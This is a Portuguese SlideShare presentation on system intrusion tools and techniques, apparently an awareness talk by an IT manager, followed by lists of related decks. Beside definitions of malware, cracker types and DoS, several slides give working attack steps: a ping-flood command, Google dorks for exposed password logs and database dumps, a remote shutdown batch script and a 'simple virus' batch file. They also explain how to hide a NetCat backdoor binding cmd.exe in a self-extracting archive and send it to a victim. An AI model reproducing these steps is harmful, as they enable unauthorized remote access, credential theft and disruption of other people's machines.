SlideShare una empresa de Scribd logo
1 de 27
Descargar para leer sin conexión
Carlos Henrique M. da Silva
carloshenrique.85@globo.com
Carlos Henrique Martins da Silva
 Formado em Análise de Sistemas
 Pós-Graduado em Auditoria em T.I.
 Gerente de TI da CLIOC – Coleção de Leishmania do
Instituto Oswaldo Cruz – Fiocruz
 Certificado em Gestão de Segurança da Informação e
Gerenciamento de T.I. pela Academia Latino-Americana
(Microsoft TechNet / Módulo Security)
VÍRUS
Pequenos programas criados para causar algum dano ao computador
infectado, seja apagando dados, seja capturando informações, seja
alterando o funcionamento normal da máquina.
SPAM
Geralmente os spams consistem em mensagens de correio eletrônico
com fins publicitarios, têm carater apelativo e na grande maioria das
vezes são incômodos e inconvenientes. Spam muito ultilizados por
Hacker’s para enganar e rendirecionar para paginas falsas da web via
email, ou para fazer com que a vitima forneça por email "dados
sensiveis". Ou Simplesmte para fazer propaganda de seu produto.
TROJANS (CAVALOS DE TRÓIA)
softwares criados com o intuito de dar acesso não autorizado a
máquina da vítima, normalmente vêm disfarçados de
programinhas úteis ou com títulos apelativos para induzir a sua
execução.
WORMS
Uma subclasse de vírus. Um worm normalmente espalha-se sem
interacção por parte do utilizador e distribui cópias completas
(possivelmente modificadas) de si próprio através das redes. Um
worm pode consumir memória ou largura de banda, o que pode fazer
com que um computador fique bloqueado.
Malware
HACKER
Adora invadir sistemas alheios para
simplesmente preencher seu ego.
Muitas de suas façanhas podem ser
discutíveis ao nível social, mas o
verdadeiro Hacker não costuma
estragar nada, subtrair programas,
ou sequer roubar informações em
detrimento de outrem. O Hacker é,
acima de tudo, um intelectual
informatizado.
CRACKER
Esses sim são os maldosos. Com um alto grau de conhecimento e
nenhum respeito, invadem sistemas e podem apenas deixar a sua
“marca” ou destruí-los completamente. Geralmente são hackers que
querem se vingar de algum operador, adolescentes que querem ser
aceitos por grupos de crackers (ou script kiddies) e saem apagando
tudo que vêem ou mestres da programação que são pagos por
empresas para fazerem espionagem industrial.
TÉCNICAS/FERRAMENTAS DE
INVASÃO
KEYLOGGERS
Os keyloogers gravam tudo o que é digitado no computador e os
enviam para o hacker (geralmente por e-mail).
FORÇA BRUTA
O conceito de força bruta é de descobrir uma senha na tentiva de
erro, ele só optmiza a tarefa de tentar uma senha depois outra.
INJECTIONS
Como o próprio nome diz, é o ato de injetar
códigos em alguma coisa. Existem três tipos de
injections mais conhecidos, o PHP Injection, SQL
Injection e o JavaScript Injection.
DoS
Com o DoS (Denial of Service ou Negação de Serviço) você não invade
o host, mas pode fazer uma bela bagunça, o conceito de DoS é de
que você vai enviar resquisições negando alguma coisa, o
computador não vai conseguir responder a tantas requisições e então
ela se desconecta.
Exemplo:
ping IP -l 65500 -n 10000000
-w 0.00001
nslookup Nome do Site
DDoS (Distirbuted Denial of Service) é como um super-DoS, onde várias
pessoas se reunem para atacar um servidor, onde uma só pessoa não vai
fazer diferença.
DDoS
Pen-Tests
O teste de penetração é um método que avalia a segurança de um
sistema de computador ou de uma rede, simulando um ataque de
uma fonte maliciosa.
portScan
PortScan é um scanneador de portas. o portscan ele sai batendo em
cada uma das portas e ve quais estao abertas. Um exemplo de
portscan é o nmap. Nmap é um brilhante portScan existente no dia de
hoje. É uma otima ferramenta, muito utilizada para invasao, para
descobrir falhas nos sistemas e descobrir portas abertas
desnecessariamente.
Google
Muita informação “sensível” pode ser encontrada, bastando que se
saiba o que procurar.
Senhas
Muitos servidores mal configurados tornam públicos seus arquivos de
registro (“logs”), permitindo assim que usuários maliciosos obtenham
senhas de sistemas (muitas vezes com privilégios de administrador)
sem trabalho algum, bastando buscar por:
filetype:log inurl:"password.log"
Google
Banco de Dados
Grande parte dos servidores web precisa de serviços de banco de
dados instalados, mas muitos não são bem configurados e acabam
fornecendo informações sigilosas, como tabelas inteiras, que podem
conter até mesmo campos com nome de usuários e senhas válidas
dentro do sistema. A seguinte busca procura por tais tabelas:
"# dumping data for table" (username|user|users) password
Conhecendo um pouco da estrutura de arquivos de uma base de
dados SQL, é possível ir diretamente atrás de arquivos que
contenham senhas, como por exemplo através da busca:
filetype:properties inurl:db intext:password
Google
Banco de Dados
É possível ainda identificar bancos de dados vulneráveis a ataques de
“injeção de SQL”, ao pesquisarmos por mensagens de erro que
tipicamente denunciam esse problema:
"ORA-00921: unexpected end of SQL command"
"ORA-00933: SQL command not properly ended"
"unclosed quotation mark before the character string"
Prompt de Comando
Descobrindo Proxies de Sites – Tracert [urldosite]
Mudadando senha de usuários – net user
net user [nome_de_usuário] *
Localizando endereço IP - Tracert [urldosite]
ip-adress.com
Prompt de Comando
Enviando mensagens via rede –
MSG * [mensagem] ou MSG IP
[mensagem]
Desligando PC via rede – shutdown
–s –t –m [vitima] – net view
Criando um vírus simples
Abra o bloco de notas
Digite start x10
Salve como hax.bat
Agora execute o arquivo e veja o que acontece
Criando Backdoor com NetCat
Aba Geral
Caminho para extração
C://WINDOWS/system32
Executar antes e após a extração
nc –d –L –n –p 1010 –e cmd.exe –v –l –p 1010
Métodos
Ocultar Tudo
Depois enviar o arquivo SFX pra vitima, executar o netcat
na sua máquina e digitar: -v –l –p 1010
echo off
shutdown -s -t 10 -m nome_pc_1 -f
shutdown -s -t 10 -m nome_pc_2 -f
shutdown -s -t 10 -m nome_pc_3 -f
shutdown -s -t 10 -m nome_pc_4 -f
shutdown -s -t 10 -m nome_pc_5 -f
pause
Salve com a extensão .bat
Prompt de Comando
Referências e Links Interessantes
www.modulo.com.br
www.universidadehacker.com
www.techtudo.com.br
www.cert.br
www.youtube.com
Carlos Henrique M. da Silva
CONTATO
carloshenrique.85@globo.com
hmartins@ioc.fiocruz.br

Más contenido relacionado

La actualidad más candente

por Bruno Milreu Filipe "Casos avançados de teste de invasão – Indo além do “...
por Bruno Milreu Filipe "Casos avançados de teste de invasão – Indo além do “...por Bruno Milreu Filipe "Casos avançados de teste de invasão – Indo além do “...
por Bruno Milreu Filipe "Casos avançados de teste de invasão – Indo além do “...SegInfo
 
Palestra: Pentest - Intrusão de Redes
Palestra: Pentest - Intrusão de RedesPalestra: Pentest - Intrusão de Redes
Palestra: Pentest - Intrusão de RedesBruno Alexandre
 
Conceito em segurança de redes de computadores
Conceito em segurança de redes de computadoresConceito em segurança de redes de computadores
Conceito em segurança de redes de computadoresRogerio Pereira
 
Ethical hacking: Conceitos básicos de Testes de penetração
Ethical hacking: Conceitos básicos de Testes de penetraçãoEthical hacking: Conceitos básicos de Testes de penetração
Ethical hacking: Conceitos básicos de Testes de penetraçãoCleórbete Santos
 
Segurança em PHP - Blinde seu código de você mesmo!
Segurança em PHP - Blinde seu código de você mesmo!Segurança em PHP - Blinde seu código de você mesmo!
Segurança em PHP - Blinde seu código de você mesmo!Gustavo Neves
 
Segurança na rede
Segurança na redeSegurança na rede
Segurança na redea20061577
 
7 Segredos sobre o PenTest e Software Livre que Todos deveriam Saber
 7 Segredos sobre o PenTest e Software Livre que Todos deveriam Saber 7 Segredos sobre o PenTest e Software Livre que Todos deveriam Saber
7 Segredos sobre o PenTest e Software Livre que Todos deveriam SaberAlcyon Ferreira de Souza Junior, MSc
 
Segurança de Redes - Keylogger e Screelongger
Segurança de Redes - Keylogger e ScreelonggerSegurança de Redes - Keylogger e Screelongger
Segurança de Redes - Keylogger e ScreelonggerCleber Ramos
 
Ferramentas de Segurança
Ferramentas de SegurançaFerramentas de Segurança
Ferramentas de SegurançaAlefe Variani
 
Construindo uma Aplicação PHP à Prova de Balas
Construindo uma Aplicação PHP à Prova de BalasConstruindo uma Aplicação PHP à Prova de Balas
Construindo uma Aplicação PHP à Prova de BalasRafael Jaques
 

La actualidad más candente (20)

por Bruno Milreu Filipe "Casos avançados de teste de invasão – Indo além do “...
por Bruno Milreu Filipe "Casos avançados de teste de invasão – Indo além do “...por Bruno Milreu Filipe "Casos avançados de teste de invasão – Indo além do “...
por Bruno Milreu Filipe "Casos avançados de teste de invasão – Indo além do “...
 
Ataques na internet
Ataques na internetAtaques na internet
Ataques na internet
 
Palestra: Pentest - Intrusão de Redes
Palestra: Pentest - Intrusão de RedesPalestra: Pentest - Intrusão de Redes
Palestra: Pentest - Intrusão de Redes
 
Metodos de invasao
Metodos de invasaoMetodos de invasao
Metodos de invasao
 
Segurança de Rede
Segurança de RedeSegurança de Rede
Segurança de Rede
 
Pentest
Pentest Pentest
Pentest
 
Segurança de Rede
Segurança de RedeSegurança de Rede
Segurança de Rede
 
Conceito em segurança de redes de computadores
Conceito em segurança de redes de computadoresConceito em segurança de redes de computadores
Conceito em segurança de redes de computadores
 
Ethical hacking: Conceitos básicos de Testes de penetração
Ethical hacking: Conceitos básicos de Testes de penetraçãoEthical hacking: Conceitos básicos de Testes de penetração
Ethical hacking: Conceitos básicos de Testes de penetração
 
Segurança em PHP - Blinde seu código de você mesmo!
Segurança em PHP - Blinde seu código de você mesmo!Segurança em PHP - Blinde seu código de você mesmo!
Segurança em PHP - Blinde seu código de você mesmo!
 
Unidade 2.3 firewall
Unidade 2.3   firewallUnidade 2.3   firewall
Unidade 2.3 firewall
 
Segurança na rede
Segurança na redeSegurança na rede
Segurança na rede
 
Ethical Hacking - Campus Party Brasília 2017
Ethical Hacking - Campus Party Brasília 2017Ethical Hacking - Campus Party Brasília 2017
Ethical Hacking - Campus Party Brasília 2017
 
7 Segredos sobre o PenTest e Software Livre que Todos deveriam Saber
 7 Segredos sobre o PenTest e Software Livre que Todos deveriam Saber 7 Segredos sobre o PenTest e Software Livre que Todos deveriam Saber
7 Segredos sobre o PenTest e Software Livre que Todos deveriam Saber
 
Unidade 2.2 ameaças
Unidade 2.2   ameaçasUnidade 2.2   ameaças
Unidade 2.2 ameaças
 
Segurança de Redes - Keylogger e Screelongger
Segurança de Redes - Keylogger e ScreelonggerSegurança de Redes - Keylogger e Screelongger
Segurança de Redes - Keylogger e Screelongger
 
teste de invasão
teste de invasãoteste de invasão
teste de invasão
 
Unidade 3 criptogradia
Unidade 3   criptogradiaUnidade 3   criptogradia
Unidade 3 criptogradia
 
Ferramentas de Segurança
Ferramentas de SegurançaFerramentas de Segurança
Ferramentas de Segurança
 
Construindo uma Aplicação PHP à Prova de Balas
Construindo uma Aplicação PHP à Prova de BalasConstruindo uma Aplicação PHP à Prova de Balas
Construindo uma Aplicação PHP à Prova de Balas
 

Destacado

Projeto em Seguranca da Informação
Projeto em Seguranca da InformaçãoProjeto em Seguranca da Informação
Projeto em Seguranca da InformaçãoFernando Palma
 
3 - segurança - psi
3 - segurança - psi3 - segurança - psi
3 - segurança - psiAndre Peres
 
BIA - Business Impact Analysis
BIA - Business Impact AnalysisBIA - Business Impact Analysis
BIA - Business Impact AnalysisAllan Piter Pressi
 
Bibliografia recomendada - programação C
Bibliografia recomendada - programação CBibliografia recomendada - programação C
Bibliografia recomendada - programação CLuiz Arthur
 
Política de Segurança
Política de SegurançaPolítica de Segurança
Política de Segurançatrindade7
 
Plano de Continuidade de Negócios - PCN
Plano de Continuidade de Negócios - PCNPlano de Continuidade de Negócios - PCN
Plano de Continuidade de Negócios - PCNFernando Pessoal
 
Segurança da Informação Aplicada
Segurança da Informação AplicadaSegurança da Informação Aplicada
Segurança da Informação AplicadaEduardo Neves
 
Planejamento de Backup de dados
Planejamento de Backup de dados Planejamento de Backup de dados
Planejamento de Backup de dados Fernando Palma
 
Ebook Gestão de segurança da informação e comunicações
Ebook Gestão de segurança da informação e comunicaçõesEbook Gestão de segurança da informação e comunicações
Ebook Gestão de segurança da informação e comunicaçõesFernando Palma
 
Template Plano de disponibilidade dos serviços
Template Plano de disponibilidade dos serviçosTemplate Plano de disponibilidade dos serviços
Template Plano de disponibilidade dos serviçosFernando Palma
 
Exemplo de plano de continuidade de ti
Exemplo de plano de continuidade de tiExemplo de plano de continuidade de ti
Exemplo de plano de continuidade de tiFernando Palma
 

Destacado (20)

Segurança da Informação Aplicada a Negócios
Segurança da Informação Aplicada a NegóciosSegurança da Informação Aplicada a Negócios
Segurança da Informação Aplicada a Negócios
 
Aula 3 - Política de Segurança da Informação (PSI)
Aula 3 - Política de Segurança da Informação (PSI)Aula 3 - Política de Segurança da Informação (PSI)
Aula 3 - Política de Segurança da Informação (PSI)
 
Aula 2 - Gestão de Riscos
Aula 2 - Gestão de RiscosAula 2 - Gestão de Riscos
Aula 2 - Gestão de Riscos
 
Aula 4 - Plano de Continuidade de Negócios (PCN)
Aula 4 - Plano de Continuidade de Negócios (PCN)Aula 4 - Plano de Continuidade de Negócios (PCN)
Aula 4 - Plano de Continuidade de Negócios (PCN)
 
Deep web
Deep webDeep web
Deep web
 
Aula 1 - Introdução a Segurança da Informação
Aula 1 - Introdução a Segurança da InformaçãoAula 1 - Introdução a Segurança da Informação
Aula 1 - Introdução a Segurança da Informação
 
Projeto em Seguranca da Informação
Projeto em Seguranca da InformaçãoProjeto em Seguranca da Informação
Projeto em Seguranca da Informação
 
Pen Test, Afinal o que é ? - FLISOL 2010
Pen Test, Afinal o que é ? - FLISOL 2010Pen Test, Afinal o que é ? - FLISOL 2010
Pen Test, Afinal o que é ? - FLISOL 2010
 
3 - segurança - psi
3 - segurança - psi3 - segurança - psi
3 - segurança - psi
 
Aula 8 - SQL Injection
Aula 8 - SQL InjectionAula 8 - SQL Injection
Aula 8 - SQL Injection
 
BIA - Business Impact Analysis
BIA - Business Impact AnalysisBIA - Business Impact Analysis
BIA - Business Impact Analysis
 
Bibliografia recomendada - programação C
Bibliografia recomendada - programação CBibliografia recomendada - programação C
Bibliografia recomendada - programação C
 
Política de Segurança
Política de SegurançaPolítica de Segurança
Política de Segurança
 
Plano de Continuidade de Negócios - PCN
Plano de Continuidade de Negócios - PCNPlano de Continuidade de Negócios - PCN
Plano de Continuidade de Negócios - PCN
 
Segurança da Informação Aplicada
Segurança da Informação AplicadaSegurança da Informação Aplicada
Segurança da Informação Aplicada
 
Aula 5 - Assinatura e Certificado Digital
Aula 5 - Assinatura e Certificado DigitalAula 5 - Assinatura e Certificado Digital
Aula 5 - Assinatura e Certificado Digital
 
Planejamento de Backup de dados
Planejamento de Backup de dados Planejamento de Backup de dados
Planejamento de Backup de dados
 
Ebook Gestão de segurança da informação e comunicações
Ebook Gestão de segurança da informação e comunicaçõesEbook Gestão de segurança da informação e comunicações
Ebook Gestão de segurança da informação e comunicações
 
Template Plano de disponibilidade dos serviços
Template Plano de disponibilidade dos serviçosTemplate Plano de disponibilidade dos serviços
Template Plano de disponibilidade dos serviços
 
Exemplo de plano de continuidade de ti
Exemplo de plano de continuidade de tiExemplo de plano de continuidade de ti
Exemplo de plano de continuidade de ti
 

Similar a Ferramentas e técnicas de invasão de sistemas

Fasciculo inf segredes_unidade_2
Fasciculo inf segredes_unidade_2Fasciculo inf segredes_unidade_2
Fasciculo inf segredes_unidade_2Eduardo Santana
 
Tcvb2.diogo.mendes.segurança informática.v1
Tcvb2.diogo.mendes.segurança informática.v1Tcvb2.diogo.mendes.segurança informática.v1
Tcvb2.diogo.mendes.segurança informática.v1diogomendes99
 
Segurança imformatica
Segurança imformaticaSegurança imformatica
Segurança imformaticaruitavares998
 
Tcvb2 flaviosimoes segurançainformatica_v1
Tcvb2 flaviosimoes segurançainformatica_v1Tcvb2 flaviosimoes segurançainformatica_v1
Tcvb2 flaviosimoes segurançainformatica_v1simoesflavio
 
Apresentação sobre segurança de redes
Apresentação sobre segurança de redesApresentação sobre segurança de redes
Apresentação sobre segurança de redesLuiz Mário Pina
 
Segurança na Internet - Conceitos fundamentais
Segurança na Internet - Conceitos fundamentaisSegurança na Internet - Conceitos fundamentais
Segurança na Internet - Conceitos fundamentaisJoão Gabriel Lima
 
Vírus e Antívirus
Vírus e AntívirusVírus e Antívirus
Vírus e AntívirusPmpc10
 
Tcvb2.rui tavares segurancainformatica
Tcvb2.rui tavares segurancainformaticaTcvb2.rui tavares segurancainformatica
Tcvb2.rui tavares segurancainformaticaruitavares998
 
Resenha o que é um hacker
Resenha o que é um hackerResenha o que é um hacker
Resenha o que é um hackernilsonsq
 
23 raquel costa 24_rodolfo estima_vírus
23 raquel costa 24_rodolfo estima_vírus23 raquel costa 24_rodolfo estima_vírus
23 raquel costa 24_rodolfo estima_vírusRodolfo Estima
 
23 raquel costa 24_rodolfo estima_vírus
23 raquel costa 24_rodolfo estima_vírus23 raquel costa 24_rodolfo estima_vírus
23 raquel costa 24_rodolfo estima_vírusidl8b24
 
Minicurso Forense Digital (Sbseg 07)
Minicurso Forense Digital (Sbseg 07)Minicurso Forense Digital (Sbseg 07)
Minicurso Forense Digital (Sbseg 07)leolemes
 
Virus ana ana-micael_e_joao
Virus ana ana-micael_e_joaoVirus ana ana-micael_e_joao
Virus ana ana-micael_e_joaobestthefour
 

Similar a Ferramentas e técnicas de invasão de sistemas (20)

Como funcionam as ameaças da internet e o cybercrime
Como funcionam as ameaças da internet e o cybercrimeComo funcionam as ameaças da internet e o cybercrime
Como funcionam as ameaças da internet e o cybercrime
 
Seguranca Cap09 Tanenbaum
Seguranca Cap09 TanenbaumSeguranca Cap09 Tanenbaum
Seguranca Cap09 Tanenbaum
 
Fasciculo inf segredes_unidade_2
Fasciculo inf segredes_unidade_2Fasciculo inf segredes_unidade_2
Fasciculo inf segredes_unidade_2
 
Tcvb2.diogo.mendes.segurança informática.v1
Tcvb2.diogo.mendes.segurança informática.v1Tcvb2.diogo.mendes.segurança informática.v1
Tcvb2.diogo.mendes.segurança informática.v1
 
Segurança imformatica
Segurança imformaticaSegurança imformatica
Segurança imformatica
 
Mallwares
MallwaresMallwares
Mallwares
 
Tcvb2 flaviosimoes segurançainformatica_v1
Tcvb2 flaviosimoes segurançainformatica_v1Tcvb2 flaviosimoes segurançainformatica_v1
Tcvb2 flaviosimoes segurançainformatica_v1
 
Virus e antivirus
Virus e antivirusVirus e antivirus
Virus e antivirus
 
Apresentação sobre segurança de redes
Apresentação sobre segurança de redesApresentação sobre segurança de redes
Apresentação sobre segurança de redes
 
Segurança Digital
Segurança DigitalSegurança Digital
Segurança Digital
 
NavegaçãO Segura
NavegaçãO SeguraNavegaçãO Segura
NavegaçãO Segura
 
Segurança na Internet - Conceitos fundamentais
Segurança na Internet - Conceitos fundamentaisSegurança na Internet - Conceitos fundamentais
Segurança na Internet - Conceitos fundamentais
 
Vírus e Antívirus
Vírus e AntívirusVírus e Antívirus
Vírus e Antívirus
 
Tcvb2.rui tavares segurancainformatica
Tcvb2.rui tavares segurancainformaticaTcvb2.rui tavares segurancainformatica
Tcvb2.rui tavares segurancainformatica
 
Exploits
ExploitsExploits
Exploits
 
Resenha o que é um hacker
Resenha o que é um hackerResenha o que é um hacker
Resenha o que é um hacker
 
23 raquel costa 24_rodolfo estima_vírus
23 raquel costa 24_rodolfo estima_vírus23 raquel costa 24_rodolfo estima_vírus
23 raquel costa 24_rodolfo estima_vírus
 
23 raquel costa 24_rodolfo estima_vírus
23 raquel costa 24_rodolfo estima_vírus23 raquel costa 24_rodolfo estima_vírus
23 raquel costa 24_rodolfo estima_vírus
 
Minicurso Forense Digital (Sbseg 07)
Minicurso Forense Digital (Sbseg 07)Minicurso Forense Digital (Sbseg 07)
Minicurso Forense Digital (Sbseg 07)
 
Virus ana ana-micael_e_joao
Virus ana ana-micael_e_joaoVirus ana ana-micael_e_joao
Virus ana ana-micael_e_joao
 

Ferramentas e técnicas de invasão de sistemas

  • 1. Carlos Henrique M. da Silva carloshenrique.85@globo.com
  • 2. Carlos Henrique Martins da Silva  Formado em Análise de Sistemas  Pós-Graduado em Auditoria em T.I.  Gerente de TI da CLIOC – Coleção de Leishmania do Instituto Oswaldo Cruz – Fiocruz  Certificado em Gestão de Segurança da Informação e Gerenciamento de T.I. pela Academia Latino-Americana (Microsoft TechNet / Módulo Security)
  • 3. VÍRUS Pequenos programas criados para causar algum dano ao computador infectado, seja apagando dados, seja capturando informações, seja alterando o funcionamento normal da máquina.
  • 4. SPAM Geralmente os spams consistem em mensagens de correio eletrônico com fins publicitarios, têm carater apelativo e na grande maioria das vezes são incômodos e inconvenientes. Spam muito ultilizados por Hacker’s para enganar e rendirecionar para paginas falsas da web via email, ou para fazer com que a vitima forneça por email "dados sensiveis". Ou Simplesmte para fazer propaganda de seu produto.
  • 5. TROJANS (CAVALOS DE TRÓIA) softwares criados com o intuito de dar acesso não autorizado a máquina da vítima, normalmente vêm disfarçados de programinhas úteis ou com títulos apelativos para induzir a sua execução.
  • 6. WORMS Uma subclasse de vírus. Um worm normalmente espalha-se sem interacção por parte do utilizador e distribui cópias completas (possivelmente modificadas) de si próprio através das redes. Um worm pode consumir memória ou largura de banda, o que pode fazer com que um computador fique bloqueado.
  • 8. HACKER Adora invadir sistemas alheios para simplesmente preencher seu ego. Muitas de suas façanhas podem ser discutíveis ao nível social, mas o verdadeiro Hacker não costuma estragar nada, subtrair programas, ou sequer roubar informações em detrimento de outrem. O Hacker é, acima de tudo, um intelectual informatizado.
  • 9. CRACKER Esses sim são os maldosos. Com um alto grau de conhecimento e nenhum respeito, invadem sistemas e podem apenas deixar a sua “marca” ou destruí-los completamente. Geralmente são hackers que querem se vingar de algum operador, adolescentes que querem ser aceitos por grupos de crackers (ou script kiddies) e saem apagando tudo que vêem ou mestres da programação que são pagos por empresas para fazerem espionagem industrial.
  • 11. KEYLOGGERS Os keyloogers gravam tudo o que é digitado no computador e os enviam para o hacker (geralmente por e-mail).
  • 12. FORÇA BRUTA O conceito de força bruta é de descobrir uma senha na tentiva de erro, ele só optmiza a tarefa de tentar uma senha depois outra.
  • 13. INJECTIONS Como o próprio nome diz, é o ato de injetar códigos em alguma coisa. Existem três tipos de injections mais conhecidos, o PHP Injection, SQL Injection e o JavaScript Injection.
  • 14. DoS Com o DoS (Denial of Service ou Negação de Serviço) você não invade o host, mas pode fazer uma bela bagunça, o conceito de DoS é de que você vai enviar resquisições negando alguma coisa, o computador não vai conseguir responder a tantas requisições e então ela se desconecta. Exemplo: ping IP -l 65500 -n 10000000 -w 0.00001 nslookup Nome do Site
  • 15. DDoS (Distirbuted Denial of Service) é como um super-DoS, onde várias pessoas se reunem para atacar um servidor, onde uma só pessoa não vai fazer diferença. DDoS
  • 16. Pen-Tests O teste de penetração é um método que avalia a segurança de um sistema de computador ou de uma rede, simulando um ataque de uma fonte maliciosa.
  • 17. portScan PortScan é um scanneador de portas. o portscan ele sai batendo em cada uma das portas e ve quais estao abertas. Um exemplo de portscan é o nmap. Nmap é um brilhante portScan existente no dia de hoje. É uma otima ferramenta, muito utilizada para invasao, para descobrir falhas nos sistemas e descobrir portas abertas desnecessariamente.
  • 18. Google Muita informação “sensível” pode ser encontrada, bastando que se saiba o que procurar. Senhas Muitos servidores mal configurados tornam públicos seus arquivos de registro (“logs”), permitindo assim que usuários maliciosos obtenham senhas de sistemas (muitas vezes com privilégios de administrador) sem trabalho algum, bastando buscar por: filetype:log inurl:"password.log"
  • 19. Google Banco de Dados Grande parte dos servidores web precisa de serviços de banco de dados instalados, mas muitos não são bem configurados e acabam fornecendo informações sigilosas, como tabelas inteiras, que podem conter até mesmo campos com nome de usuários e senhas válidas dentro do sistema. A seguinte busca procura por tais tabelas: "# dumping data for table" (username|user|users) password Conhecendo um pouco da estrutura de arquivos de uma base de dados SQL, é possível ir diretamente atrás de arquivos que contenham senhas, como por exemplo através da busca: filetype:properties inurl:db intext:password
  • 20. Google Banco de Dados É possível ainda identificar bancos de dados vulneráveis a ataques de “injeção de SQL”, ao pesquisarmos por mensagens de erro que tipicamente denunciam esse problema: "ORA-00921: unexpected end of SQL command" "ORA-00933: SQL command not properly ended" "unclosed quotation mark before the character string"
  • 21. Prompt de Comando Descobrindo Proxies de Sites – Tracert [urldosite] Mudadando senha de usuários – net user net user [nome_de_usuário] * Localizando endereço IP - Tracert [urldosite] ip-adress.com
  • 22. Prompt de Comando Enviando mensagens via rede – MSG * [mensagem] ou MSG IP [mensagem] Desligando PC via rede – shutdown –s –t –m [vitima] – net view
  • 23. Criando um vírus simples Abra o bloco de notas Digite start x10 Salve como hax.bat Agora execute o arquivo e veja o que acontece
  • 24. Criando Backdoor com NetCat Aba Geral Caminho para extração C://WINDOWS/system32 Executar antes e após a extração nc –d –L –n –p 1010 –e cmd.exe –v –l –p 1010 Métodos Ocultar Tudo Depois enviar o arquivo SFX pra vitima, executar o netcat na sua máquina e digitar: -v –l –p 1010
  • 25. echo off shutdown -s -t 10 -m nome_pc_1 -f shutdown -s -t 10 -m nome_pc_2 -f shutdown -s -t 10 -m nome_pc_3 -f shutdown -s -t 10 -m nome_pc_4 -f shutdown -s -t 10 -m nome_pc_5 -f pause Salve com a extensão .bat Prompt de Comando
  • 26. Referências e Links Interessantes www.modulo.com.br www.universidadehacker.com www.techtudo.com.br www.cert.br www.youtube.com
  • 27. Carlos Henrique M. da Silva CONTATO carloshenrique.85@globo.com hmartins@ioc.fiocruz.br